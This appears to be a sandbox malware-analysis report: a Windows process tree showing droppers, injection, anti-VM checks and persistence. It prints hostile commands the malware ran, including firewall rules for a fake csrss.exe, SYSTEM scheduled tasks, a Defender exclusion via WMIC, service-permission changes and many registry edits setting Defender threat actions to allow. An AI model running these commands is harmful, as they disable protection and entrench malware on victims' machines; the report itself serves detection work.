- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2468
- - C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
    "C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Users\Admin\AppData\Local\Temp\ulc.0.exe
      "C:\Users\Admin\AppData\Local\Temp\ulc.0.exe"
      4⤵
      Executes dropped EXE
      PID:1572
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 1020
        5⤵
        Program crash
        
        PID:4368
  - - C:\Users\Admin\AppData\Local\Temp\ulc.3.exe
      "C:\Users\Admin\AppData\Local\Temp\ulc.3.exe"
      4⤵
      Blocklisted process makes network request
      Checks computer location settings
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:3204
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1552
      4⤵
      Program crash
      PID:3984
- - C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
    "C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe"
    3⤵
    - Modifies firewall policy service
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:4592
- - C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
    "C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3936
  - - C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
      "C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4364
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:748
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2672
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2500
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3376
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4980
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2672
- - C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
    "C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4936
  - - C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
      "C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:4804
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2108
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3936
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2484
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:4428
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3596
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1572
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:216
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        Suspicious use of AdjustPrivilegeToken
        
        PID:2604
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2560
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:1456
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1484
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3596
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3284
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1284
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4780
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        Executes dropped EXE
        
        PID:2560
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        Suspicious use of AdjustPrivilegeToken
        
        PID:4744
- - C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
    "C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Modifies system certificate store
    - Suspicious use of WriteProcessMemory
    PID:3208
  - - C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
      C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e68e1d0,0x6e68e1dc,0x6e68e1e8
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3748
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe" --version
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4504
  - - C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
      "C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140451" --session-guid=8aaab569-435b-484d-b795-e57cfab4635d --server-tracking-blob="MDA2MDQ4NDdiNTgyZWQ3ZDNiNDY4Y2RjZWQ0YmViOGQ3YTMwYjMwYzZiMDI4NWY4ODYxYThhZGEzNTJiYzgzZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N19fNDU2Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTAiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzEzNTM1NDgwLjY1MjciLCJ1dG0iOnsiY2FtcGFpZ24iOiI3NjdfXzQ1NiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6Im1rdCJ9LCJ1dWlkIjoiY2VjMGJlZDYtMDhhNi00MWU4LWI0OGQtOTMxZDZkOGU3NDExIn0= " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
        
        C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
      4⤵
      Executes dropped EXE
      PID:4756
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --version
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4408
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x426038,0x426044,0x426050
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3068
- - C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe
    "C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe"
    3⤵
    - Executes dropped EXE
    PID:2704
  - - C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe
      .\Install.exe /nxdidQZJ "385118" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      PID:4860
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:4336
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:3084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4296
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3512
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe\" em /TIsite_iduEE 385118 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Creates scheduled task(s)
        
        PID:1208
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
  2⤵
  PID:220

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1572 -ip 1572
1⤵
PID:1380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 768 -ip 768
1⤵
PID:4604

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:3512

C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe em /TIsite_iduEE 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5440
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:5488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5752
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5800
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5832
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5848
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5884
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5900
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5932
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5948
